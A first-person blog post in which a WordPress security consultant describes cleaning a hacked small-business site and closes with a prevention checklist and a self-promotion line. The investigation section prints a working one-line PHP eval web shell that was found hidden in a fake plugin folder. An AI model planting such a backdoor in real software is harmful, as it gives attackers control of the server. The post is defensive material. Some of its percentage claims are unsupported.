The 2 AM Phone Call That Changed How I Handle Every WordPress Site Forever

I’ll never forget the 2 AM phone call.

The ringtone jolted me from a dead sleep — the kind of deep sleep you only get after a 14-hour workday. My first thought was that someone had died. The voice on the other end was trembling.

“Our website… it’s gone. Just… gone. Customers are calling saying they’re being redirected to some… some pharmacy site. Google is showing a red warning. Please. I don’t know what to do.”

It was a local business owner — a small e-commerce store that sold handmade goods. They were a family operation. Three employees. Two young kids at home for the owner. And now, their entire digital storefront had been ripped apart by someone on the other side of the world.

I swung my legs out of bed, opened my laptop, and typed their domain.

What I saw made my stomach drop.

The Scene of the Crime

The homepage was defaced. Instead of their beautiful product photography and warm welcome message, there was a black screen with green text that read:

“Hacked by CyberGhost — Your security is a joke.”

Beneath it, a looping animation of skulls. Classy.

I checked Google. Typed “site:theirwebsite.com” into the search bar. The results showed page titles filled with Viagra keywords, casino spam, and links to counterfeit handbags. Their carefully crafted SEO was buried under digital garbage.

Then I clicked their own link.

Redirect. Within two seconds, I was sent to a sketchy domain selling fake luxury watches. The kind of site that probably steals credit cards the moment you enter them.

My heart was racing. This wasn’t just vandalism. This was theft of trust.

The client, let’s call him “Mike” (not his real name), was still on the phone. I could hear his wife crying in the background.

“We have orders to ship tomorrow. Our customer email list. Our product photos. Do you have a backup?”

I took a breath.

“We’re going to fix this. But I need you to listen carefully and do exactly what I say.”

The Hard Truth About What We Were Up Against

Here’s the part I had to admit to myself — and eventually to Mike. This hack was almost entirely preventable.

Their WordPress site was running a theme that hadn’t been updated in two years. A plugin called “Revolution Slider” (a notorious target for hackers) was three versions behind. The admin password? “admin123.” I wish I was joking.

No security plugin. No firewall. Backups? They thought their hosting company handled that automatically. They didn’t.

I had warned Mike three months earlier about updating his plugins. He’d said, “Let’s wait until after the holiday rush.”

The holiday rush never came. Instead, we got this.

Lesson #1 burned into my brain that night: Security isn’t a “someday” task. It’s a “today or you’ll regret it” task.

Phase 1: Stop the Bleeding

Panic is the real enemy in a hack. It makes you do stupid things like delete everything or click random “clean my site” buttons from Google search results.

I forced myself to slow down and follow a containment protocol I’d developed after previous incidents.

🚨 Immediate Actions (First 30 Minutes)

• Put the site in maintenance mode. I edited the .htaccess file to redirect all traffic to a simple “Site Down for Maintenance” page. This stopped visitors from seeing the redirects and getting infected themselves.
• Changed EVERY password. Hosting account. FTP/SFTP. Database. WordPress admin. Even the client’s email (in case it was compromised). Every single one became a 20-character random string stored in a password manager.
• Called the hosting provider. I asked them to temporarily disable any outgoing connections from the server (to stop the malware from “phoning home” to its command center) and to provide me with raw access logs from the past 30 days.
• Created a “crime scene” backup. Before touching anything, I downloaded a complete copy of all files and the database. This preserved evidence in case we needed it later.

The client’s tone shifted slightly. Having a clear, step-by-step plan calmed both of us down. Chaos thrives on uncertainty. Methodical action kills it.

Phase 2: The Investigation (Where Did They Get In?)

With the site offline, I started hunting for the entry point. This is like detective work — looking for the open window the burglar crawled through.

Step 1: Run Automated Scanners

I installed Wordfence (the free version) and ran a full scan. It flagged 47 “suspicious” files. Then I ran Sucuri SiteCheck online. It confirmed the malware was still present.

But scanners miss things. Always. So I rolled up my sleeves and got manual.

Step 2: Manual File Inspection via FTP

I connected via FTP and started browsing the file structure. Here’s what I found:

The /uploads/ folder (2023 directory):
A file named wp-update.php that shouldn't exist. Inside, base64-encoded gibberish. Decoded, it was a web shell—a backdoor that lets attackers run commands on the server like they own it.

The /themes/ folder (active theme):
The 404.php file had been rewritten. Instead of a friendly error page, it contained encrypted code that activated redirects only for Google bots and random visitors (to avoid detection by the site owner).

The /plugins/ folder:
A directory named wp-cache-warmup that wasn't a real plugin. Inside, a file called index.php with a single line: <?php @eval($_POST['cmd']); ?>

That tiny line was the master key to their entire server.

Lesson #2: Attackers hide backdoors in plain sight. They name files to look legitimate (wp-config-backup.php, admin-ajax-new.php) and tuck them into folders you never check.

Step 3: Database Deep Dive (phpMyAdmin)

The database was even worse.

I logged into phpMyAdmin and checked the wp_users table. Two unknown admin users—hack3r and support_team—had been added with full privileges.

The wp_options table had a new entry: wprss_redirect_url containing the pharmacy spam site.

The wp_posts table had hundreds of draft posts filled with gambling keywords and hidden links. They were unpublished, so the site owner never saw them, but Google's crawlers did.

That’s why Google blacklisted them. Search engines treat hidden spam as deceptive content.

Phase 3: The Cleanup (Surgery Time)

Now came the tedious part — removing the infection without breaking the site.

🔧 Cleaning Checklist (What Actually Worked)

• Deleted ALL suspicious files manually. I went through every flagged file Wordfence found, plus the ones I discovered manually. Any file I couldn’t verify as legitimate was moved to a “quarantine” folder on my local machine (not deleted immediately — just in case).
• Reinstalled WordPress from scratch. Downloaded a fresh copy of the latest WordPress version from wordpress.org. Deleted the old wp-admin and wp-includes folders entirely, then uploaded the new ones. This ensures no core files remain infected.
• Reinstalled EVERY plugin and theme clean. Deleted all plugins (even the legitimate ones) and reinstalled them from the official WordPress repository. For premium plugins, I downloaded fresh copies from the original vendor. Same for the theme.
• Cleaned the database via phpMyAdmin. Removed the fake admin users. Deleted the spam post entries (using a SQL query: DELETE FROM wp_posts WHERE post_content LIKE '%casino%'). Removed malicious entries from wp_options.
• Removed suspicious .htaccess rules. Hackers love hiding redirects in .htaccess. I deleted the existing file and generated a clean one by saving WordPress's permalinks settings again.
• Reset all secret keys and salts. I generated new authentication keys in wp-config.php (WordPress provides a generator for this). This forces all active login sessions to expire immediately.

The entire cleanup took about 8 hours spread across two days. I worked in focused sprints, taking breaks to avoid fatigue-fueled mistakes.

Phase 4: The Recovery (Getting Back in Google’s Good Graces)

With the site clean and hardened, I brought it back online. The maintenance mode page came down. The real homepage returned.

But Google still showed the red warning.

This is the part most people forget: cleaning your site isn’t enough. You have to tell Google you cleaned it.

📝 Google Blacklist Removal Request

1. Verified site ownership in Google Search Console. (If you haven’t done this, do it NOW. Don’t wait for a hack.)
2. Clicked “Security Issues” in the left sidebar. Google showed: “Harmful site detected — pages that navigate away from the site”
3. Clicked “Request Review.” This opens a form where you explain what you fixed.

I wrote a detailed, honest explanation:

“The site was compromised via an outdated plugin (Revolution Slider). Attackers injected a backdoor in /uploads/ and added spam content to the database. We have: removed all malicious files, reinstalled WordPress core, updated all plugins/themes, changed all passwords, installed a firewall, and rotated all secret keys. Please review.”

Then we waited.

Day 1: No change.
Day 2: Still red. The client was getting anxious.
Day 3 (morning): Still red.
Day 3 (evening): I refreshed Search Console… and saw “No issues detected.”

I clicked the homepage. It loaded clean. No redirect. No skulls. No pharmacy spam.

I called Mike.

“Check your site.”

Silence. Then a shaky breath.

“It’s back. Oh my God. It’s actually back.”

What I Learned (And What You Should Steal)

That 2 AM phone call changed how I handle every WordPress site I touch. Here’s what I now do without exception — and what you should too.

🔐 The Non-Negotiable Security Checklist

ActionFrequencyWhy It MattersDaily automated backups (stored OFF-SERVER, like Google Drive or AWS)DailyWhen a hack happens, you restore from a clean backup. Without it, you’re manually scrubbing malware.Update WordPress, plugins, themesWeekly90% of hacks exploit outdated software. One week of delay is all a botnet needs.Remove unused plugins/themesMonthlyEvery inactive plugin is a potential backdoor. Delete it.Strong passwords + 2FAOnce (enforce for all users)“admin123” isn’t a password. It’s an invitation.Security plugin (Wordfence or Sucuri)Always activeAutomated scanning catches what you miss.Web Application Firewall (WAF)Always activeBlocks malicious traffic BEFORE it reaches your site.Change default login URL (from /wp-admin to something custom)OnceReduces brute force attacks by 99%.

The Hardest Conversation

The most painful part of this entire ordeal wasn’t the technical cleanup. It was explaining to Mike that the hack was completely preventable.

“I should have listened about the updates,” he said. “I thought it wouldn’t happen to us.”

That’s the thing about cybersecurity. Everyone thinks they’re too small, too unimportant, too “nobody-wants-to-hack-us” to be a target.

But most hacks aren’t targeted. They’re automated. Bots scan the entire internet 24/7, looking for vulnerable sites. They don’t care if you’re a local bakery or a multinational bank. They find an open door, they walk through it, and they plant their garbage.

Mike’s site wasn’t targeted. It was opportunistic.

He’s on a strict update schedule now. Weekly. No excuses. And he has off-server backups for the first time.

Final Thoughts: Don’t Panic. Follow the Steps.

If your WordPress site gets hacked tonight (and I hope it doesn’t), here’s what I want you to remember:

1. Breathe. Panic leads to bad decisions.
2. Take the site offline (maintenance mode or .htaccess redirect).
3. Change ALL passwords before you do anything else.
4. Create a “crime scene” backup before cleaning.
5. Scan + manually inspect files (don’t trust scanners alone).
6. Reinstall WordPress core, plugins, and themes clean.
7. Clean the database (phpMyAdmin is your friend).
8. Request Google review via Search Console.
9. Implement prevention so it never happens again.

And if you’re reading this before you’ve been hacked? Go update your plugins right now. Change your admin password. Set up backups.

That 2 AM phone call? It could have been a 2 PM email saying “Thanks for keeping us secure.”

Choose the email.

Key Takeaways Box

✅ Backups save lives. Store them off-server (Google Drive, Dropbox, AWS).
✅ Updates aren’t optional. Schedule them weekly.
✅ Remove what you don’t use. Old plugins/themes are liabilities.
✅ Use a security plugin + firewall. Free versions are better than nothing.
✅ Monitor Google Search Console. You’ll know about blacklisting immediately.
✅ Don’t wait for a crisis. Prevention costs far less than recovery.

Have a hacked site right now? Need help but don’t want to go through this alone?

I’m Shamir Ajmir Khan — a Cybersecurity Specialist who cleans hacked WordPress sites and keeps them clean. You can reach me here and Don’t panic. Just reach out. We’ll fix it together.